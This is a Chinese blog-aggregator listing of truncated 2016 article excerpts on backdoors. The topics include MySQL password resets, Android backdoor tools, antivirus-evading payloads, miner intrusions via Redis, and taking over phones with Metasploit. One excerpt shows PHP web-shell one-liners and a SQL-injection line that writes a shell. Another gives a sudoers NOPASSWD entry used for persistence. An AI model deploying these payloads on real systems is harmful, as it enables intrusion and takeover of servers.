我们在使用MySQL的时候,有时候会忘记用户的密码尤其是root用户的密码,这时候就需要走一下后门改一下密码了,思路和linux改root用户密码差不多都是先绕过权限认证阶段然后用一条updateuser命令更新密码,如果要恢复误删除的root用户需要在MySQL的user表中加入root必须手动加入..
分类:
数据库 时间:
2016-10-29 02:24:54
阅读次数:
260
SPADE,一款安卓手机的后门控制工具,安全研究人员可以以此了解和研究安卓后门原理。 首先,我们从网站www.apk4fun.com下载apk文件,如ccleaner。然后,我们安装spade git clone https://github.com/suraj-root/spade.git 之后, ...
分类:
移动开发 时间:
2016-10-25 18:56:26
阅读次数:
299
Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。 ...
分类:
其他好文 时间:
2016-10-15 02:07:12
阅读次数:
197
赋予用户sudo权限 vi /etc/sudoers 添加如下一行: USER ALL=(ALL) NOPASSWD: ALL (实现当前用户允许转换成任意用户及执行任意命令) 添加root权限账户 (1)命令添加法 创建帐号:# useradd [-u UID] [-g GID] [-d HOME ...
分类:
系统相关 时间:
2016-10-08 19:48:21
阅读次数:
215
1.F5图片隐写 先是用binwalk看了一下 -D=类型 -E 解压zip等 1.F5图片隐写 先是用binwalk看了一下 -D=类型 -E 解压zip等 确定了没有后门,根据题目的提示,另外参考了P神的WriteUp,刷新的健应该是F5,也就是F5隐写。 从这个github网站下载F5隐身的解 ...
分类:
其他好文 时间:
2016-09-16 00:11:57
阅读次数:
1250
参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd入侵的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/在服务器中执行top查询,发现有minerd进程占用CPU达到90%多;ps-au..
分类:
其他好文 时间:
2016-09-08 18:39:46
阅读次数:
222
1 故事开始首先剧透一下后门木马:Linux.BackDoor.Gates.5http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击,那时 ...
分类:
数据库 时间:
2016-09-05 00:13:10
阅读次数:
227
思路:上传一个“后门”,通过控制后门来得到shell,比如一句话木马。比如:<?system($_REQUEST[‘cmd‘]);?>//通过request提交,执行shell<?php@eval($_POST[‘chopper‘]);?>//PHP一句话木马,直接上菜刀这里构造如下语句:1‘and1=2unionselect"<?",system($_REQU..
分类:
数据库 时间:
2016-09-04 17:54:20
阅读次数:
364
1 ssh后门 检察语句: grep -E "user,pas|user:pas" /usr/bin/* /usr/local/sbin/* /usr/local/bin/* /bin/* /usr/sbin/* /root/bin/* -al 检察方法:如发现以下三个红框内的其中一个请截图并记录, ...
分类:
系统相关 时间:
2016-09-03 21:14:06
阅读次数:
283
在这篇文章中我们将讨论如何获取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。 (文章内容存在一定攻击性,目的在于普及终端安全知识、提高安全意识,如有非法使用 ...
分类:
微信 时间:
2016-08-20 16:03:29
阅读次数:
3662
